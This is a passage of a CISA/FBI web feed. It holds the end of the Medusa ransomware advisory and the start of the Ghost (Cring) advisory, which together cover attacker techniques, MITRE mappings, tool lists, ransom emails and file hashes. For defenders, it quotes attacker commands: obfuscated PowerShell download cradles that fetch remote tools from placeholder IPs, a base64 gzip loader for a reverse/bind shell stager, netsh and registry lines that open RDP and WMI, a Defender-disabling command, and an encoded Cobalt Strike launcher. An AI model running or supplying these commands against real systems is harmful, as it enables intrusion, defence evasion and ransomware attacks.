information.</p> <h3>Defense Evasion</h3> <p>Medusa actors use LOTL to avoid detection [<a href="https://attack.mitre.org/versions/v16/tactics/TA0005/" title="Defense Evasion">TA0005</a>]. (See&nbsp;<strong>Appendix A</strong> for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (<code>certutil.exe</code>) is used to avoid detection when performing file ingress.</p> <p>Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a>].</p> <p>In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File">T1027.013</a>] using specific execution settings.</p> <ul> <li><code>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;</code></li> </ul> <p>In another example, the&nbsp;DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a>].</p> <ul> <li><code>powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RAS tool&gt;.msi)</code></li> </ul> <p>In the final example, the payload is an obfuscated base64 string read into memory, decompressed from&nbsp;<code>gzip</code>, and used to create a&nbsp;<code>scriptblock</code>. The base64 payload is split using empty strings and concatenation, and uses a format operator (<code>-f</code>) followed by three arguments to specify character replacements in the base64 payload.</p> <ul> <li><code>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((</code></li> <li><code>New-Object System.IO.StreamReader(</code></li> <li><code>New-Object System.IO.Compression.GzipStream((</code></li> <li><code>New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(</code></li> <li><code>(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;','&lt;character replacement 1&gt;', '&lt;character replacement 2&gt;')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</code></li> </ul> <p>The obfuscated base64 PowerShell payload is identical to <code>powerfun.ps1</code>, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port <code>443</code> [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>], and initiates a connection to a remote port <code>443</code> in the reverse shell.</p> <p>In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].</p> <p>FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:</p> <ul> <li>Ligolo. <ul> <li>A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.</li> </ul> </li> <li>Cloudflared. <ul> <li>Formerly known as ArgoTunnel.</li> <li>Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.</li> </ul> </li> </ul> <h3>Lateral Movement and Execution</h3> <p>Medusa actors use a variety of legitimate remote access software [<a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software">T1219</a>]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v16/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a>] and PsExec [<a href="https://attack.mitre.org/versions/v16/techniques/T1569/002/" title="System Services: Service Execution">T1569.002</a>]—to move laterally [<a href="https://attack.mitre.org/versions/v16/tactics/TA0008/" title="Lateral Movement">TA0008</a>] through the network and identify files for exfiltration [<a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration">TA0010</a>] and encryption [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. When provided with valid username and password credentials, Medusa actors use PsExec to:</p> <ul> <li>Copy (<code>-c</code>) one script from various batch scripts on the current machine to the remote machine and execute it with <code>SYSTEM</code> level privileges (<code>-s</code>).</li> <li>Execute an already existing local file on a remote machine with <code>SYSTEM</code> level privileges.</li> <li>Execute remote shell commands using <code>cmd /c</code>.</li> </ul> <p>One of the batch scripts executed by PsExec is <code>openrdp.bat</code>, which first creates a new firewall rule to allow inbound TCP traffic on port <code>3389</code>:</p> <ul> <li><code>netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow</code></li> </ul> <p>Then, a rule to allow remote WMI connections is created:</p> <ul> <li><code>netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes</code></li> </ul> <p>Finally, the registry is modified to allow Remote Desktop connections:</p> <ul> <li><code>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</code></li> </ul> <p><a href="https://attack.mitre.org/versions/v16/software/S0002/" title="Mimikatz">Mimikatz</a> has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [<a href="https://attack.mitre.org/versions/v16/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>] to harvest credentials [<a href="https://attack.mitre.org/tactics/TA0006/" title="Credential Access">TA0006</a>] and aid lateral movement.</p> <h3>Exfiltration and Encryption</h3> <p>Medusa actors install and use <a href="https://attack.mitre.org/versions/v16/software/S1040/" title="Rclone">Rclone</a> to facilitate exfiltration of data to the Medusa C2 servers [<a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [<a href="https://attack.mitre.org/versions/v16/techniques/T1072/" title="Software Deployment Tools">T1072</a>] to deploy the encryptor, <code>gaze.exe</code>, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a <code>.medusa</code> file extension. The process <code>gaze.exe</code> terminates all services [<a href="https://attack.mitre.org/versions/v16/techniques/T1489/" title="Service Stop">T1489</a>] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [<a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a>] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [<a href="https://attack.mitre.org/versions/v16/techniques/T1529/" title="System Shutdown/Reboot">T1529</a>] and encrypt virtual machines and delete their previously installed tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a>].</p> <h3>Extortion</h3> <p>Medusa RaaS employs a double extortion model, where victims must pay [<a href="https://attack.mitre.org/versions/v16/techniques/T1657/" title="Financial Theft">T1657</a>] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a&nbsp;<code>.onion</code> data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.</p> <p>FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.</p> <h2><strong>Indicators of Compromise</strong></h2> <p><strong>Table 1</strong> lists the hashes of malicious files obtained during investigations.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 1: Malicious Files</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Files</th> <th role="columnheader">Hash (MD5)</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>!!!READ_ME_MEDUSA!!!.txt</td> <td>Redacted</td> <td>Ransom note file</td> </tr> <tr> <td>openrdp.bat</td> <td>44370f5c977e415981febf7dbb87a85c</td> <td>Allows incoming RDP and remote WMI connections</td> </tr> <tr> <td>pu.exe</td> <td>80d852cd199ac923205b61658a9ec5bc</td> <td>Reverse shell</td> </tr> </tbody> </table> <p><strong>Table 2</strong> includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2: Medusa Email Addresses</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Email Addresses</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>key.medusa.serviceteam@protonmail.com</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>medusa.support@onionmail.org</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>mds.svt.breach@protonmail.com</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>mds.svt.mir2@protonmail.com</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>MedusaSupport@cock.li</td> <td>Used for ransom negotiation</td> </tr> </tbody> </table> <h2><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></h2> <p>See <strong>Table 3</strong> – <strong>Table 11</strong>&nbsp;for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK® Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;3: Initial Access</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Technique Title</th> <th role="columnheader">ID</th> <th role="columnheader">Use</th> </tr> </thead> <tbody> <tr> <td>Exploit Public-Facing Application</td> <td><a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td> <td>Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.</td> </tr> <tr> <td>Initial Access</td> <td><a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a></td> <td>Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access.</td> </tr> <tr> <td>Phishing</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a></td> <td>Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.</td> </tr> </tbody> </table> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;4: Defense Evasion</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Technique Title</th> <th role="columnheader">ID</th> <th role="columnheader">Use</th> </tr> </thead> <tbody> <tr> <td>Indicator Removal: Clear Command History</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a></td> <td>Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.</td> </tr> <tr> <td>Obfuscated Files or Information: Encrypted/Encoded File</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File ">T1027.013</a></td> <td>Medusa actors use a well-known evasion technique that executes a base64 encrypted command.</td> </tr> <tr> <td>Obfuscated Files or Information</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a></td> <td>Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.</td> </tr> <tr> <td>Indicator Removal</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a></td> <td>Medusa actors deleted their previous work and tools installed.&nbsp;</td> </tr> <t #StopRansomware: Ghost (Cring) Ransomware https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a US-CERT Alerts urn:uuid:9acf1d45-4155-38e9-38a6-5b158026af4b Wed, 19 Feb 2025 16:38:21 +0000 <h2><strong>Summary</strong></h2> <p><em><strong>Note:</strong> This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit&nbsp;</em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p> <p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.</p> <p>Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.</p> <p>Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.</p> <p>Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.</p> <p>The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.</p> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf" class="c-file__link" target="_blank">AA25-050A #StopRansomware: Ghost (Cring) Ransomware</a> <span class="c-file__size">(PDF, 735.18 KB )</span> </div> </div> <p>For a downloadable copy of IOCs, see:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/AA25-050A.stix_.xml" class="c-file__link" target="_blank">AA25-050A STIX XML</a> <span class="c-file__size">(XML, 78.67 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/AA25-050A-%23StopRansomware-Ghost-%28Cring%29-Ransomware.stix_.xml" class="c-file__link" target="_blank">AA25-050A STIX XML (Additional IOCs)</a> <span class="c-file__size">(XML, 74.01 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/AA25-050A-%23StopRansomware-Ghost-%28Cring%29-Ransomware.stix_.json" class="c-file__link" target="_blank">AA25-050A STIX JSON</a> <span class="c-file__size">(JSON, 68.47 KB )</span> </div> </div> <h2><strong>Technical Details</strong></h2> <p><strong>Note:</strong> This advisory uses the&nbsp;<a href="https://attack.mitre.org/versions/v16/" title="MITRE ATT&amp;CK® Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16.1. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Initial Access</h3> <p>The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [<a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (<a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379" title="CVE-2018-13379">CVE-2018-13379</a>), servers running Adobe ColdFusion (<a href="https://nvd.nist.gov/vuln/detail/CVE-2010-2861" title="CVE-2010-2861">CVE-2010-2861</a> and&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2009-3960" title="CVE-2009-3960">CVE-2009-3960</a>), Microsoft SharePoint (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0604" title="CVE-2019-0604">CVE-2019-0604</a>), and Microsoft Exchange (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34473" title="CVE-2021-34473">CVE-2021-34473</a>,&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34523" title="CVE-2021-34523">CVE-2021-34523</a>, and&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-31207" title="CVE-2021-31207">CVE-2021-31207</a>— commonly referred to as the ProxyShell attack chain).</p> <h3>Execution</h3> <p>Ghost actors have been observed uploading a web shell [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>] to a compromised server and leveraging Windows Command Prompt [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] and/or PowerShell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] to download and execute&nbsp;<a href="https://attack.mitre.org/software/S0154/" title="Cobalt Strike">Cobalt Strike</a> Beacon malware [<a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls.</p> <h3>Persistence</h3> <p>Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [<a href="https://attack.mitre.org/versions/v16/techniques/T1136/001/" title="Create Account: Local Account">T1136.001</a>] and domain accounts [<a href="https://attack.mitre.org/versions/v16/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a>] and change passwords for existing accounts [<a href="https://attack.mitre.org/versions/v16/techniques/T1098/" title="Account Manipulation">T1098</a>]. In 2024, Ghost actors were observed deploying web shells [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>] on victim web servers.</p> <h3>Privilege Escalation</h3> <p>Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the&nbsp;SYSTEM user context to impersonate the&nbsp;SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [<a href="https://attack.mitre.org/versions/v16/techniques/T1134/001/" title="Access Token Manipulation: Token Impersonation/Theft">T1134.001</a>].</p> <p>Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [<a href="https://attack.mitre.org/versions/v16/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>]&nbsp;such as “<a href="https://github.com/leitosama/SharpZeroLogon" title="SharpZeroLogon">SharpZeroLogon</a>,” “SharpGPPPass,” “<a href="https://github.com/BeichenDream/BadPotato" title="BadPotato">BadPotato</a>,” and “<a href="https://github.com/BeichenDream/GodPotato" title="GodPotato">GodPotato</a>.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials.&nbsp;</p> <p>See&nbsp;<strong>Table 1</strong> for a descriptive listing of tools.</p> <h3>Credential Access</h3> <p>Ghost actors use the built in Cobalt Strike function “hashdump” or&nbsp;<a href="https://attack.mitre.org/versions/v16/software/S0002/" title="Mimikatz">Mimikatz</a> [<a href="https://attack.mitre.org/versions/v16/techniques/T1003/" title="OS Credential Dumping">T1003</a>] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices.</p> <h3>Defense Evasion</h3> <p>Ghost actors used their access through Cobalt Strike to display a list of running processes [<a href="https://attack.mitre.org/versions/v16/techniques/T1057/" title="Process Discovery">T1057</a>] to determine which antivirus software [<a href="https://attack.mitre.org/versions/v16/techniques/T1518/001/" title="Software Discovery: Security Software Discovery">T1518.001</a>] is running so that it can be disabled [<a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are:&nbsp;Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.</p> <h3>Discovery</h3> <p>Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [<a href="https://attack.mitre.org/versions/v16/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a>], open-source tools such as “<a href="https://github.com/mitchmoser/SharpShares" title="SharpShares">SharpShares</a>” for network share discovery [<a href="https://attack.mitre.org/versions/v16/techniques/T1135/" title="Network Share Discovery">T1135</a>], and “<a href="https://github.com/k8gege/Ladon">Ladon 911</a>” and “<a href="https://github.com/BronzeTicket/SharpNBTScan" title="SharpNBTScan">SharpNBTScan</a>” for remote systems discovery [<a href="https://attack.mitre.org/versions/v16/techniques/T1018/" title="Remote System Discovery">T1018</a>]. Network administrators would be unlikely to use these tools for network share or remote systems discovery.</p> <h3>Lateral Movement</h3> <p>Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [<a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with:&nbsp;powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA…&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1132/001/" title="Data Encoding: Standard Encoding">T1132.001</a>][<a href="https://attack.mitre.org/versions/v16/techniques/T1564/003/" title="Hide Artifacts: Hidden Window">T1564.003</a>].</p> <p>This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine.</p> <p><strong>In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim.</strong></p> <h3>Exfiltration</h3> <p>Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked.&nbsp;The FBI has observed limited downloading of data to Cobalt Strike Team Servers [<a href="https://attack.mitre.org/versions/v16/techniques/T1041/" title="Exfiltration Over C2 Channel">T1041</a>]. Victims and other trusted third parties have reported limited uses of&nbsp;Mega.nz [<a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] and installed web shells for similar limited data exfiltration.&nbsp;<strong>Note:</strong> The typical data exfiltration is less than hundreds of gigabytes of data.</p> <h3>Command and Control</h3> <p>Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example,&nbsp;http://xxx.xxx.xxx.xxx:80/Google.com where&nbsp;xxx.xxx.xxx.xxx<em>&nbsp;</em>represents the C2 server’s IP address.</p> <p>For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [<a href="https://attack.mitre.org/versions/v16/techniques/T1573/" title="Encrypted Channel">T1573</a>] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.</p> <p><strong>Note:</strong>&nbsp;<strong>Table 2</strong> contains a list of Ghost ransom email addresses.</p> <h3>Impact and Encryption</h3> <p>Ghost actors use&nbsp;Cring.exe, Ghost.exe,&nbsp;ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.</p> <p>These ransomware payloads clear Windows Event Logs [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/001/" title="Indicator Removal: Clear Windows Event Logs">T1070.001</a>], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [<a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a>]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>].</p> <p>The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.</p> <h2><strong>Indicators of Compromise (IOC)</strong></h2> <p><strong>Table 1</strong> lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.</p> <p><strong>Note:</strong> Authors of these tools generally state that they should not be used in illegal activity.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;1: Tools Leveraged by Ghost Actors</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Name</th> <th role="columnheader">Description</th> <th role="columnheader">Source</th> </tr> </thead> <tbody> <tr> <td>Cobalt Strike</td> <td>Cobalt Strike is penetration testing software. Ghost&nbsp;actors &nbsp;use an unauthorized version of Cobalt Strike.</td> <td>N/A</td> </tr> <tr> <td>IOX</td> <td>Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device.</td> <td>github[.]com/EddieIvan01/iox</td> </tr> <tr> <td>SharpShares.exe</td> <td>SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery.</td> <td>github[.]com/mitchmoser/SharpShares</td> </tr> <tr> <td>SharpZeroLogon.exe</td> <td>SharpZeroLogon.exe attempts to exploit&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472" title="CVE-2020-1472">CVE-2020-1472</a> and is run against a target Domain Controller.</td> <td>github[.]com/leitosama/SharpZeroLogon</td> </tr> <tr> <td>SharpGPPPass.exe</td> <td>SharpGPPPass.exe attempts to exploit&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2014-1812" title="CVE-2014-1812">CVE-2014-1812</a> and targets XML files created through Group Policy Preferences that may contain passwords.</td> <td>N/A</td> </tr> <tr> <td>SpnDump.exe</td> <td>SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration.</td> <td>N/A</td> </tr> <tr> <td>NBT.exe</td> <td>A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration.</td> <td>github[.]com/BronzeTicket/SharpNBTScan</td> </tr> <tr> <td>BadPotato.exe</td> <td>BadPotato.exe is an exploitation tool used for privilege escalation.</td> <td>github[.]com/BeichenDream/BadPotato</td> </tr> <tr> <td>God.exe</td> <td>God.exe is a compiled version of GodPotato and is used for privilege escalation.</td> <td>github[.]com/BeichenDream/GodPotato</td> </tr> <tr> <td>HFS (HTTP File Server)</td> <td>A portable web server program that Ghost&nbsp;actors&nbsp;use to host files for remote access and exfiltration.</td> <td>rejitto[.]com/hfs</td> </tr> <tr> <td>Ladon 911</td> <td>A multifunctional scanning and exploitation tool, often used by Ghost actors with the&nbsp;MS17010 option to scan for SMB vulnerabilities associated with&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2017-0143" title="CVE-2017-0143">CVE-2017-0143</a> and&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2017-0144" title="CVE-2017-0144">CVE-2017-0144</a>.</td> <td>github[.]com/k8gege/Ladon</td> </tr> <tr> <td>Web Shell</td> <td>A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.</td> <td>Slight variation of <a class="ck-anchor" id="OLE_LINK3"></a>github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx</td> </tr> </tbody> </table> </div> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">File name</th> <th role="columnheader">MD5 File Hash</th> </tr> </thead> <tbody> <tr> <td>Cring.exe</td> <td>c5d712f82d5d37bb284acd4468ab3533</td> </tr> <tr> <td>Ghost.exe</td> <td> <p>34b3009590ec2d361f07cac320671410</p> <p>d9c019182d88290e5489cdf3b607f982</p> </td> 